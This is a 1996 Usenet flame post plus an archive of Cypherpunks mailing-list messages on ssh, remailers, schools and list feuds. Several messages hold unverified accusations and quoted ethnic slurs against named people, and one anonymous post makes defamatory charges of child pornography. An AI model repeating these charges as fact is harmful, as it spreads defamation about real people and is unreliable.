Newsgroups: alt.privacy,news.admin.censorship,alt.censorship,news.admin.internet.discuss,news.admin.net-abuse.misc,misc.activism.cannabis,talk.politics.crypto,soc.culture.russian,soc.culture.ukrainian,soc.culture.turkish
Organization: Fearless Usenet Cabal Killers
References: <peterson.842497039@ucsub.Colorado.EDU>
Reply-To: cypherpunks@toad.com
Xref: nntp1.best.com alt.privacy:21485 news.admin.censorship:16659 alt.censorship:110334 news.admin.net-abuse.misc:123473 talk.politics.crypto:11363 soc.culture.russian:62434 soc.culture.ukrainian:26634 soc.culture.turkish:111417

In article <peterson.842497039@ucsub.Colorado.EDU>,
peterson@ucsub.Colorado.EDU (Peterson Penny) writes:
>The Cypherpunks gang has apparently attacked a San Francisco artist's
>www site, harrassing him and mail-bombing his service provider in an
>attempt to get him to drop the account. The Cpunks objected to an applett
>that this artist had on one of his pages that would send a mail greeting
>to people who had a *mail-to:* button on their www pages. This greeting
>consisted of his URL only and went through an anon remailer.
>
>
>More info and a sample of the email robot can be found at:
>
>        http://www.hipcrime.com

My Ph.D. is in crypto and I've been monitoring the Cypherpunks mailing list
for a couple of years. I can attest that many of its regular, like Timothy C.
May, are censorous control freaks who are very much into suppressing any views
they don't like. Their harrassment includes sending hate e-mail via the
anonymous remailers, forging compromising messages (the way Tim May's been
attributing to me nonsense I've never said), postmaster complaints, etc. Many
recent threads on the list echo the news.groups/news.admin.net-abuse.misc
threads on how democratic votes on newsgroup election must be replaced by
Cabal decisions, how "spammers" can be better harrassed, etc. Most Cypherpunks
support the most reactionary and pro-censorship views on news.*. One can see
announcements like "There will be a physical cypherpunks meeting at [place].
[Person] will not be allowed in because I don't like his political views." In
particular, I've witnessed the recent harrassement of "hotcrime" by Tim May's
cybermob and was utterly disgusted, not for the first time. Here is one of the
e-mails that Tim May's latest victim sent to the Cypherpunks mailing list:

>Message-Id: <3238FD6C.5CB7@precipice.v-site.net>
>Date: Thu, 12 Sep 1996 23:21:32 -0700
>From: HipCrime <robert@precipice.V-site.net>
>Organization: Stark Raving Math
>To: cypherpunks@toad.com
>Cc: admin@superhot.com
>
>Here's a collection of your various threats:
>
>> I suspect you may soon be hearing from far worse than I ...
>> Some punks take their colors seriously.
>
>> Congradulations. I had at first thought you were a simple fool.
>> Now I'm certain you're an idiot.
>
>> Sounds to me like every remailer can legally be altered to send a
>> small message to hipcrime every time it processes any messages.
>
>> if anyone's got a T3 handy, you could always take the direct approach.
>
>In making these threats, you've mistaken me for someone who cares.
>Someone who cares what you send to my box.  I'm actually, and in fact,
>homeless in real life.  Yes, both an "idiot" and a "simple fool":
>your compliments in my book.  My only equipment is access to friends'
>computers, and a free dialup that the big-hearted SysOp at V-Site gives
>me.  (By the way, you've been merciless to him).
>
>In view of this fact:  Do you think that even 1,000,000 messages into
>my stupid electronic mailbox would matter?  Some nights my worries are
>of a place to sleep, not how many messages will accumulate during my
>slumber.
>
>CypherPunks live so far from real-life, that it's impossible for them
>to communicate rationally.  Never having any danger in their lives,
>they want to avoid encountering any in "cyberspace".  They are trying
>to craft that new world according to their intellectual guidelines.
>Trying to make sure real-world annoyances have been removed.
>
>This is what HipCrime's real offense was:  providing a piece of
>unexpected (ok,ok "unwanted", if you prefer) stimulus.  Only a single
>one.  A tiny-little URL, but sent without warning, anonymously, and
>pointing to a strange site.
>
>Since I've UNSUBSCRIBED from your CypherWimps mailing list, and still
>receive your messages (two copies, the one you send me, and the one
>you send the list), my only conclusion is that Email is your only
>social discourse.  Take notice that after this, all future messages
>from y'all will feel the power of the DELETE button (unread and barely
>noticed).
>
>Think of how easy it is to move around in "cyberspace".  Do this math:
>	1,000,000 messages = 1 new domain + 1 new mailbox.
>
>In this argument you win, junk Email is SPAM ... but junk SnailMail is
>
>		THIN SLICES CUT FROM OUR PRECIOUS FORESTS.
>
>
>-- HTTP://www.HIPCRIME.com

Despite the name, there's practically no crypto discussions on the list. A few
weeks ago someone mentioned elliptic curves, and there was an outcry of how
it's "off-topic". Instead the mailing list is flooded with rants and personal
attacks from Tim May, who knows next to nothing about cryptography, and whose
long-winded diatribes in support of child pornography, drugs, and Harry Browne
have absolutely no crypto relevance. Tim's off-topic spews have driven Eric
Hughes, John Gilmore, Rich Salz, and many other former valuable contributors
off the mailing list. Today's Cypherpunks don't write code - they write lies
and personal attacks. I'll quote a couple of Tim May's unprovoked personal
attacks against me to illustrate the kind of traffic found on the Cypherpunks
mailing list (as opposed to cryptography discussions):

>Message-Id: <ae13272612021004e248@[205.199.118.202]>
>To: ichudov@algebra.com (Igor Chudov)
>From: tcmay@got.net (Timothy C. May)
>Subject: Lying Purebred Sovok Tchurkas Write the History of the Net
>Cc: cypherpunks@toad.com
>
>At 4:17 AM 7/18/96, Igor Chudov @ home wrote:
>
>>Knowing KGB habits as pertaining to releasing information to the public,
>>I would expect 50% of the CDROM to be pure bullshit, 40% -- lies, and
>>maybe 10% truth that was already publicly available.
>>
>>It is like buying a CDROM about the history of the Net from Dr. Grubor.
>>Maybe it would be interesting and amusing, but not worth $120.
>
>NOW you tell me! I just shelled out $42 for "The History of the Net," by
>Dr. John Grubor and Dr. Dmitri Vulis, 1996.
>
>And here I thought it was the real history of the Net, especially the part
>about how "the dandruff-covered Peter Vorobieff (spit) conspired with the
>purebred Sovok Valery Fabrikant (spit) to spread the lies of the Jew
>cripples dying of AIDS in Sovok-controlled clinics."
>
>When Grubor and Vulis speak of the Usenet Cabal being a Sovok (spit) plot,
>I thought this was the actual truth. I guess not. Maybe Spafford is
>actually Rabbi Ruthenberg.
>
>--Tim May
>
>(hint: this a satire, based on the writings of Vulis, who speaks of people
>as "lying purebred Sovok Tchurkas" (whatever _they_ are), and attaches the
>charming word "(spit)" after nearly every person he references.)

I responded to Tom May stating that I've never called anybody a (t)churka (I'm
not even quite sure who or what they are) and asked him to retract his false
claims. Tim May never retracted, but continued to post more lies about me and
to attribute to me various nonsense I never wrote. But Tim May's attempts at
"character assassination" don't stop at the cypherpunks mailing list: recently
three separate people whom I respect (unlike Tim May) and who work in the
computer security field told me that Tim May has been complaining to them
"off-list" about my submissions to the Cypherpunks mailing list.

Here's another recent example of a personal attack Tim May posted to the list:

>Message-Id: <ae5e09fb04021004c8e5@[207.167.93.63]>
>Mime-Version: 1.0
>Content-Type: text/plain; charset="us-ascii"
>To: cypherpunks@toad.com
>From: tcmay@got.net (Timothy C. May)
>Subject: Reputation Systems in Action
>Sender: owner-cypherpunks@toad.com
>Precedence: bulk
>
>At 6:41 PM 9/11/96, paul@fatmans.demon.co.uk wrote:
>>> tcmay@got.net (Timothy C. May) writes:
>>> > As to "tasteless and insulting," a matter of personal perspective. I find
>>> > it helpful to call a spade a spade, and others apparently do as well.
>>> >
>>>
>>> Of course, Tim gets very uncomfortable when others call a spade a spade.
>>
>>
>>This constant character assasination of Tim is getting rather boring,
>>as far as I can see, and I read all of the posts on the list, he has
>>done nothing more than ignore posts from these idiots, that is his
>>choice and nothing to do with anyone else.
>
>But this latest episode illustrates the role of reputations. Namely, my own
>reputation is not being harmed by bizarre commentaries from the Vulis-bot.
>As its reputation is (apparently) pretty low, and associated with Serdar
>Ardic-style rants about "sovoks," "the cabal," and "spit," such an entity
>can hardly "assassinate" my character.

Again, Tim May is lying. I am not interested in "assassinating" his character.
He is the one spreading lies about me and attributing to me various nonsense I
never said. Tim May shows his true colors when he faults me for my defense of
Serdar Argic's freedom of speech. Unfortunately, Serdar has been silent for
over two years, but that doesn't stop censorous liars like Tim May from
continuing their vendetta against those who defended free speech.

>A few years ago Larry Detweiler, aka "vznuri" ("visionary"), aka "S.Boxx,"
>aka "Pablo Escobar," aka several other alternate personalities, wrote
>dozens of screeds denouncing me, Eric Hughes, Nick Szabo, Hal Finney, etc.
>Did this have an effect on our reputations? Not to people I respected, of
>course. And if Detweiler's rants affected my reputation with his peers,
>including Dimitri Vulis, Ludwig Plutonium, Doctress Neutopia, Serdar Argic,
>well, this is to the good.

We keep catching Tim May in major lies:

1. Tim May attributes to me things I never said.

2. Tim May was caught lying about Kelly Goen.

3. Tim May is lying about Detweiler. As far as I know, Detweiler never had any
problems with Eric Hughes et al, and Hughes doesn't have a problem with
Detweiler. The only person Detweiler has a problem with is Tim May. Detweiler
is 100% correct in saying that Tim May is an ignorant liar and a crook.

4. Sovok VZNuri is not Detweiler - even Tim May doesn't believe his own lies.

5. Archimedes (former Ludwig) Plutonium and Doctress Libby Neutopia know a lot
more about cryptography and are far more truthful than Timothy C. May.

>In the mathematics of reputations, a negative reputation held by one whose
>own reputation is negative is a positive.

_If it's true, then my reputation benefits from being slandered by the proven
liar Tim May.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Corbet <corbet@stout.atd.ucar.edu>
Date: Sat, 28 Sep 1996 02:04:13 +0800
To: cypherpunks@toad.com
Subject: Re: ssh - How widely used?
In-Reply-To: <Pine.SUN.3.94.960926174203.498E-100000@polaris>
Message-ID: <199609271501.JAA14868@atd.atd.ucar.EDU>
MIME-Version: 1.0
Content-Type: text/plain


> Does anyone know if there are MS-Dos or Mac versions of the ssh client?
> How much is ssh used?

Ssh is good stuff -- we use it here.  Things I like:

	- It's an easy, drop-in replacement for the r* commands.  It's
	  easy to get people to use it.

	- It creates that much more encrypted traffic on the net.  That 
	  can only be a good thing, eh?

	- There are a few different authentication modes, which makes life
	  easy.  Host keys can be used for fixed machines; per-user keys
	  can sit on the laptop and work no matter whose network you've
	  plugged into today.

When my local ISP found a password sniffer running on his machine and went
into red alert, I just smiled and didn't bother to change my passwords on
hosts I had logged into via the ISP's net.

Good stuff.

jon

Jonathan Corbet
National Center for Atmospheric Research, Atmospheric Technology Division
corbet@stout.atd.ucar.edu	     http://www.atd.ucar.edu/rdp/jmc.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sat, 28 Sep 1996 01:35:12 +0800
To: cypherpunks@toad.com
Subject: Re: Public Schools
Message-ID: <v03007802ae71826108c0@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain


I forwarded this to someone, who said:


--- begin forwarded text


From: somebody
Date: Fri, 27 Sep 1996 00:26:28 -0400
To: rah@shipwright.com
Subject: Re: Public Schools

Bob,

I'm not sure I want to get my name on this particular set of info,
but the story on IQ and SAT scores is, to a certain extent, spelled out
in "The Bell Curve."

The simple, short version is for IQ where the distribution is nearly normal
with a mean of 100 and a standard deviation of 15.

(Recall that, in a normal distribution, two standard deviations above the
mean (2-sigma) is achieved by only 1-2%, and 3-sigma, by a factor of 10
fewer.)

There used to be a simple (public) answer for the SAT: mean of 500 and
standard deviation of 100.  So 500  = 100 and 800 = 145? Well, maybe.

The answer for SAT (verbal) scores (1961 data only, sorry) is neither short
nor simple.  The distribution is decidely non-normal.  The peak is at
280-ish, and the high side looks kind of like a normal distribution.  If it
were, the standard deviation would be 170 or so.

Because of this, the average is 475-ish.  Oh, well.

Thus, maybe, an SAT of 800 = an IQ of 145.  But 475 = 100? Or is it 280 =
100?

And of course, the populations aren't even close to the same.  Only those who
might go to college take the SAT.  And in 1961 that was even more so.

Maybe that's why they call them social scientists.



--- end forwarded text


Cheers,
Bob Hettinga


-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"'Bart Bucks' are not legal tender."
                -- Punishment, 100 times on a chalkboard,
                       for Bart Simpson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Sat, 28 Sep 1996 03:48:48 +0800
To: cypherpunks@toad.com
Subject: Re: Public Schools
In-Reply-To: <324BD4FD.3372@unidial.com>
Message-ID: <v03007800ae71bb8f8b1f@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:22 AM -0400 9/27/96, ronsimpson wrote:
>I hate to burst any bubbles but, the school with the highest number of
>National Merit Finalists and highest number of 1600 SATs is a Public
>High School (Jefferson High in Fairfax, VA)

I took some of my science classes at Jefferson.

Yes, shocking as it may seem, I AM A PRODUCT OF PUBLIC SCHOOLS.

Help me before it's too late.

(Seriously, my view is that schools are not very important. All success,
academic or technical, derives from one basic determining factor: those who
read for pleasure, succeed, and those who don't read for pleasure, don't.
The young child who reads will usually keep reading, whether novels,
encyclopedias, lists like this, etc. The child who is not into reading will
likely never get into it later in life. Which is OK, as there is a serious
shortage of tradesmen, at least in my area, and more kids ought to be
taught usable trades. Seriously. Our "ideal" that all children should
attend college is absurd, given the lack of academic preparation, desire,
and reading skills that so many high school students lack. Most community
colleges are essentially becoming Grades 13-14, with most of the Grade
13-14 students reading at the 9th-grade level (which most of us on this
list were reading at when we were in the 7th-grade, or earlier).)

--Tim May



We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Murray <ericm@lne.com>
Date: Sat, 28 Sep 1996 04:12:11 +0800
To: corbet@stout.atd.ucar.edu (Jonathan Corbet)
Subject: Re: ssh - How widely used?
In-Reply-To: <199609271501.JAA14868@atd.atd.ucar.EDU>
Message-ID: <199609271621.JAA25705@slack.lne.com>
MIME-Version: 1.0
Content-Type: text/plain


Jonathan Corbet writes:
 
[stuff about SSH deleted]

 
> When my local ISP found a password sniffer running on his machine and went
> into red alert, I just smiled and didn't bother to change my passwords on
> hosts I had logged into via the ISP's net.

You probably should.  There's more places to 'sniff' information than
just from the network.  An example is the Streams-based tty snooper.
It pushes a Streams module between the tty and the shell.
No encryption program can protect that, as it has to be in
the clear unless you can do RC4 in your head. :-)

The program I'm thinking of (sorry I forgot the name) lets the operator
both read and write to any tty session on the machine.


-- 
Eric Murray  ericm@lne.com  ericm@motorcycle.com  http://www.lne.com/ericm
If you don't see the fnords, they won't eat your packets.  If you do see the
fnords, they will eat your packets, so you won't see them.
PGP keyid:E03F65E5 fingerprint:50 B0 A2 4C 7D 86 FC 03  92 E8 AC E6 7E 27 29 AF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ronsimpson <ronsimpson@unidial.com>
Date: Sat, 28 Sep 1996 00:34:09 +0800
To: cypherpunks@toad.com
Subject: Public Schools
Message-ID: <324BD4FD.3372@unidial.com>
MIME-Version: 1.0
Content-Type: text/plain


I hate to burst any bubbles but, the school with the highest number of
National Merit Finalists and highest number of 1600 SATs is a Public
High School (Jefferson High in Fairfax, VA)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sat, 28 Sep 1996 01:45:46 +0800
To: cypherpunks@toad.com
Subject: Re: Newsgroup proposal: misc.anonymous
In-Reply-To: <v0300782cae70481d711d@[206.119.69.46]>
Message-ID: <v03007806ae7183b9596e@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:47 pm -0400 9/26/96, Mark M. wrote:
> It is still active.  However, there are many people who do not receive the
> alt.* groups and those who do may only receive newsgroups "approved" by
> the news admin.  It is much more difficult to restrict distribution of
> newsgroups carried by most major news feeds.  Also, some NNTP servers may
> expire alt groups faster than the other hierarchies which is very undesirable
> for message pools.

It seems that if newsgroup RFC and the whole rigamarole of newsgroup voting
was set up, there would be enough people -- on this list alone, probably --
who would be interested enough in the idea to at least vote (publically)
for it. I certainly would, just to see what happens.

Of course, that means that someone *else* ;-) has to actually put the train
on the track, much less lay the rails, which, as usual, is the main problem
here. If we had some ham, we could have some ham and eggs, if we had some
eggs. If you  lived here, you'd be home now. And so forth.

Same as it ever was.

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"'Bart Bucks' are not legal tender."
                -- Punishment, 100 times on a chalkboard,
                       for Bart Simpson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Sat, 28 Sep 1996 03:48:04 +0800
To: cypherpunks@toad.com
Subject: "Soul Catcher" Computer Chip (fwd)
Message-ID: <Pine.3.89.9609270951.A23028-0100000@netcom14>
MIME-Version: 1.0
Content-Type: text/plain




What's next? Thought escrow?

--Lucky

---- Forwarded Message from other list ------
Figured you might be interested in this.  I copied it from Nexus 
Oct/Nov 1996.

QUOTE

SOUL CATCHER IMPLANTS

British scientists are developing a concept for a computer chip 
which, when implanted into the skull behind the eye, will be able to
record a person's every life time thought ands sensation.

"This is the end of death," said Dr. Chris Winter of British 
Telecom's artificial-life team.  He predicts that within thirty years
it will be possible to relive other people's lives by playing back
their experiences on a computer.  "By combining this information with
a record of a person's genes, we could recreate a person physically,
emotionally and spiritually."

Dr Winter and his team of scientists at BT's Martlesham Heath 
Laboratories, near Ipswich, call the chip "the Soul Catcher."

British telecom would not divulge how much money it is investing in
the project, but Dr. Winter said it was taking "Soul Catcher 2025"
very seriously.  He confessed there were profound ethical
considerations, butr emphasised that BT was embarking on this line of
research so it could keep at the forefront of communications
technology.

Dr. Winter said "an implanted chip would be like an aircraft's black
box, and would enhance communications beyond current concepts.  "For
example, police would be able to use it to relive an attack, rape or
murder from the victims viewpoint, to help catch the criminal...  I
could even play back the smells, sounds and sighs of my holidays to
friends.

Other more frightening applications include downloading an older
person's experiences into a newborn baby by transplanting the chip.

Sources: The Daily Telegraph, the Daily Mail, 18 July 1996

UNQUOTE




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mixmaster@remail.obscura.com (Mixmaster)
Date: Sat, 28 Sep 1996 04:50:12 +0800
To: cypherpunks@toad.com
Subject: Jena Remailer
Message-ID: <199609271630.JAA24185@sirius.infonex.com>
MIME-Version: 1.0
Content-Type: text/plain


 wmono@Direct.CA wrote:

 w> On Sun, 22 Sep 1996, Mixmaster wrote:

 >> Can any native English speaker please paraphrase the account
 >> start-up procedure for us?

 w> I took a stab at re-writing the help file, and I've attached it below.
 w> The operator of jena might want to use it instead of the help file
 w> currently being distributed, after correcting any errors and adding
 w> the German sections back in.

OK, it's an improvement, but there's still some obscurity and a couple
of other problems:

 w> I believe these instructions are correct -- I was able to follow them
 w> to create a nym, and use it.  YMMV.

So far I have had no luck, but this may be due to a mail lag, I dunno...

 w>     * The hexadecimal key-ID forms the Email address.  For example,
        if the nym's key is 0x01020304, the address will be:
        anon-01020304@as-node.jena.thur.de

Already a confusion:  Is not the address pseudonym@as-node.jena.thur.de?

And, since the key ID is an eight-digit hex number, why the confusing

        "...if the nym's key is 0x01020304, the address will be:"
                                ^^
...or am I missing something already?

 w>     * The user-ID of the key contains the pseudonym, only.  Note:
        This is different from the convention, which is to include the
        Email address in angle brackets.

OK, so if I understand this properly, when prompted for an account name
in PGP one simply enters

        pseudonym

...with no quotes or address ("pseudonym" <pseudonym@someplace.net>).

 w> If the signature is valid, the decrypted body should be a header for
 w> the outbound mail, followed by a blank line, then the body for the
 w> outbound mail.  The following are headers considered valid by the
 w> server:

 w>  * Subject: (or Anon-Subject:)

 w>  * To: (or Anon-To:)

 w>  * Newsgroups: (or Post-To: or Anon-Post-To:)

The header fields in parens are identical in function or not?

 w>  - Run 'pgp -esa -u "pseudonym" anon@as-node anonid.asc' to sign and
 w>     encrypt the extracted key for the server.

These various command lines in the helpfile do not work in the pre-legal
PGP 2.6/uix/ui versions preferred by many, though equivalent command
lines of course exist.

 w>  - Test your nym by posting to a test group (de.test is recommended
       due to the location of the server) and wait several days before
       requesting mail delivery.

Well, the sent message didn't show up in the newsgroup here, but there
are often lengthy delays anyway...

 w>  - If it didn't work, repeat the entire procedure.  It's possible that
       the key-ID already exists in the server's database and belongs to
       another pseudonym.

The procedure didn't produce results for me so far, but before trying
again I wish to get confirmation that I am trying properly:

(Shortform directions)

        1:  Generate key with simple, one-word pseudonym, no quotes, no
            address, no nothing.

        2:  Generate -kxa keyfile, pseudo.asc

        3:  -esa encrypt keyfile with Jenaer Remailer's PGP key and send
            to anon@as-node.jena.thur.de via a remailer.

        4:  Account is automatically established and should work
            immediately.

To test...

        1:  Prepare message textfile according to sample:

                Newsgroups: de.test
                Subject: Test

                This is the test message textbody...

            [or, alternately...]

                To: de.test@news.demon.co.uk
                Subject: Test

                This is the test message textbody...

        2:  PGP encrypt the filebody and two header lines with the Jenaer
            Remailer's key using the -esa command, signing the cyphertext
            with your key previously sent to the remailer.

        3:  Send the resulting cyphertext message to the Jenaer Remailer
            via another remailer, making sure to avoid command words in
            the Subject: field of the outgoing message.

As I say, following these protocols I have not yet seen a resulting
message in the test group I have chosen.  Do you feel this is due to
lag, or am I doing something obviously wrong?

 w> 2E.request Email to be delivered?

[...]

 w> - Never request a delivery to your real Email address.

So here's what I really want to know:  When/if the new account is up and
running, how _does_ one discreetly retrieve his mail?  I don't see how,
other than to have it sent to alt.anonymous.messages via a mail2news
netmail address such as alt.anonymous.messages@news.demon.co.uk and then
pick through the mess there until some cyphertext message responds to
his right key.

Either that or else have it sent to yet another pseudonymous account,
with all the uncertainties and delivery vicissitudes that entails.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Sat, 28 Sep 1996 04:47:14 +0800
To: cypherpunks@toad.com
Subject: VCRS and Crypto
In-Reply-To: <199609270322.UAA14111@mail.pacifier.com>
Message-ID: <v03007801ae71bef557a7@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:22 PM -0800 9/26/96, jim bell wrote:

>Remember the VHS/Beta VCR wars?  With a fairly equal market in about 1978,
>Beta died 10 years later because the market couldn't support two
>incompatible standards.  It wasn't that one was dramatically better than the
>other, it was simply that having two standards forced the market to
>duplicate stocks, for the machines as well as tapes, particularly
>pre-recorded tapes.  Notice, however, that VCR's are relatively "isolated":
>It doesn't really matter if you have one format and your neighbor has
>another, unless you want to swap tapes.  But crypto telephones inherently
>require (in the long term) full intercompability.  If you didn't have that,
>there'd be half a world of people you couldn't call!

Be careful when drawing conclusions from the "VCR Wars." (BTW, James
Lardner has a book out on this subject.)

There are various interpretations of what happened. While I, for example,
had both formats, I ultimately shelved my Beta unit. Some views often heard:

* The longer recording time of VHS was more compelling to most consumers
than the higher quality of Beta. Not surprising in the late 70s, early 80s,
when most consumers had televisions incapable of showing the difference in
quality. (Even today, most consumers are happy to rent VHS tapes which are
rather "dodgy" in quality.)

* VHS was "Pretty Good Video," and PGV was enough for its time.

* Once VHS took a lead over Beta, the snowball effect took hold. Video
rental stores started to appear in earnest in around 1980, and by then VHS
had enough of a lead over Beta to cause the stores to stock VHS tapes for
rental over Beta tapes. This dramatically widened the lead of VHS over Beta.

(Jim's point: "Notice, however, that VCR's are relatively "isolated":  It
doesn't really matter if you have one format and your neighbor has
another, unless you want to swap tapes." But in fact a large fraction of
all VHS owners use their machines to _rent_ tapes, so the compatibility
with what the many rental stores carry is paramount.)

A tenuous link to crypto is that various VCR formats can still
intercommunicate because they all use NTSC (or PAL, SECAM in some
countries) as the "common language." This is analogous to the way various
flavors of PGP on various platforms can communicate with other flavors
because ASCII text is read and written by all.

As I have argued many times, this was really the Big Win for PGP, that it
did not use an odd or proprietary format that was platform-specific. Such
basic ASCII operation ensures interoperability, and is of course
inconsistent with the government talk of making sure that key-escrow
products cannot interoperate with non-key-escrow or "alternately"-escrowed
products.

--Tim May




We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dustbin Freedom Remailer <dustman@athensnet.com>
Date: Sat, 28 Sep 1996 01:11:58 +0800
To: cypherpunks@toad.com
Subject: The daily reminder regarding Timothy C. May, the licenced fellatiologist
Message-ID: <199609271340.JAA02217@godzilla.athensnet.com>
MIME-Version: 1.0
Content-Type: text/plain


Embedded in Timothy C. May's babblings are
preposterous lies, wild distortions, child
pornography (both as graphic descriptions and
in JPEG format), ethnic slurs, and bomb-
making recipes. No wonder he encrypts them.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: martin hamilton <M.T.Hamilton@lboro.ac.uk>
Date: Fri, 27 Sep 1996 20:01:38 +0800
To: cypherpunks@toad.com
Subject: Re: ssh - How widely used?
In-Reply-To: <199609270039.TAA05797@homeport.org>
Message-ID: <Pine.SOL.3.95.960927084957.29504A-100000@sun-cc201>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 26 Sep 1996, Adam Shostack wrote:

> 	Theres a windows version, mac is under vauge development.  SSH
> is pretty cool, but the code base is somewhat messy, and its shows
> signs of its origins in things like systems calls not having their
> return values checked.

Shame it costs $$$, though I appreciate that Tatu needs to eat... ;-) 

Perhaps Cedomir Igaly could be persuaded to release the source code to the
Windows port he did ?  Anyone else interested in getting a little group
together to hack on this ?  (under GPL or BSD style copyright)

Martin





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: craigw@dg.ce.com.au
Date: Fri, 27 Sep 1996 10:34:55 +0800
To: PhneCards@aol.com
Subject: Re: An idle thought on CBC and block lengths
Message-ID: <199609262359.JAA18913@mac.ce.com.au>
MIME-Version: 1.0
Content-Type: text/plain


Well I do believe that your spam would be illegal if  that was the 
case. And secondly there are no laws here in australia that you can 
use to prosecute me from the US for an email bomb, not that this is 
one, and if it is than so is your spam.


>> It is illegal to use a invalid return email address.  If this continues, I
>> will
>> be forced to prosecute the return email address - which they are
>> making to look like you.

>Is it?  I beleive that if you look closely, you will discover hat all the
>laws which would have made lying illegal on the 'Net have now been
>repealed by more Federal judges than I can count on 1 hand...

        ,'~``.              \|/              ,'``~.
        (-o=o-)            (@ @)            ,(-o=o-),
+--.oooO--(_)--Ooo-----oOO-(_)-OOo-------oooO--(_)--Oooo.------+
|                                                              |
|   Soon, we may all be staring at our computers, wondering    |
|               whether they're staring back.                  |
|                                                              |
| [Network Admin For WPA Business Products.  aka doshai >;-) ] |
|    .oooO        http://pip.com.au/~doshai/      Oooo.        |
|    (   )   Oooo.                        .oooO   (   )        |
+-----\ (----(   )-------oooO-Oooo--------(   )--- ) /---------+
       \_)    ) /                          \ (    (_/
             (_/                            \_)
Key fingerprint = 2D F4 54 BB B4 EA F1 E7  B6 DE 48 92 FC 8D FF 49
Send a message with the subject "send pgp-key" for a copy of my key.
(if I want to give it to you)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sat, 28 Sep 1996 02:03:07 +0800
To: cypherpunks@toad.com
Subject: In defense, sort of, of Phill Hallam-Baker
In-Reply-To: <199609270005.TAA00319@smoke.suba.com>
Message-ID: <v03007810ae71885f7102@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:24 pm -0400 9/26/96, Timothy C. May wrote:

> Any, I had several e-mail exchanges (in private) with Phill on this
> subject, and I hardly think he's a "thoroughly lousy human being."


Let me first say that I have my Mac Eudora filters set so that if any
message contains Phill's e-mail address and cypherpunks it goes straight to
the trash.

Sorry, Phill, but most of what you say here only raises my blood pressure,
so I'd rather not read it, or any of the justifiable but predictable
responses people have here to it.

Having said that, I do not bozo-filter Phill anywhere else on the net.

The reason is, he makes valuable contributions to lists like micropay
(which he started), or dcsb (which he is a founding member of), or any
other non-political discussion he's in. With the exception of politics, in
my opinion, he is *not* clueless.

More to the point, Phill even shows up at DCSB meetings, and I think he's a
nice guy, and I like to think that I can call him a friend.

However, I also think that Phill has this passion for order that sometimes
borders on the pathological. Maybe because, like Bertrand Russell (who
Phill and I both admire) says, romanticism, leftism and communism are
basically feudalism in disguise, and Phill's a closet aristocrat. ;-).
Maybe not.

I think what we see as his blustering trolls on this list come from
passion. But, I don't think they're trolls at all. I think they show, more
often than not, his outrage at the way the world's going to go. Which,
obviously, is *our* way, and not his. He knows very well the power of the
technology we talk about here, and deep down, I think he knows we're right.

Phill, and Dorothy Denning, and David Sternlight, and other smart, nice (I
haven't met Sternlight), and otherwise clueful people like them, are all
living in a state of heavy denial right now, and they're very articulate
about it. :-). I figure the best way to give them room is to just filter
them out in places where they disturb me, and get on with the business of
proving them wrong.

They'll wake up. Everybody will, sooner or later.

Cheers,
Bob Hettinga




-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"'Bart Bucks' are not legal tender."
                -- Punishment, 100 times on a chalkboard,
                       for Bart Simpson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Sat, 28 Sep 1996 01:23:20 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: RE: LivePGP (fwd)
Message-ID: <199609271533.KAA08175@homeport.org>
MIME-Version: 1.0
Content-Type: text


----- Edited message from Ming-Ching Tiew -----

>From mctiew@csi.po.my  Thu Sep 26 22:36:39 1996
Message-ID: <01BBAC57.C7351E60@minuet>
From: Ming-Ching Tiew <mctiew@csi.po.my>
To: "'Adam Shostack'" <adam@homeport.org>
Subject: RE: LivePGP
Date: Fri, 27 Sep 1996 09:39:21 +-800
Encoding: 38 TEXT



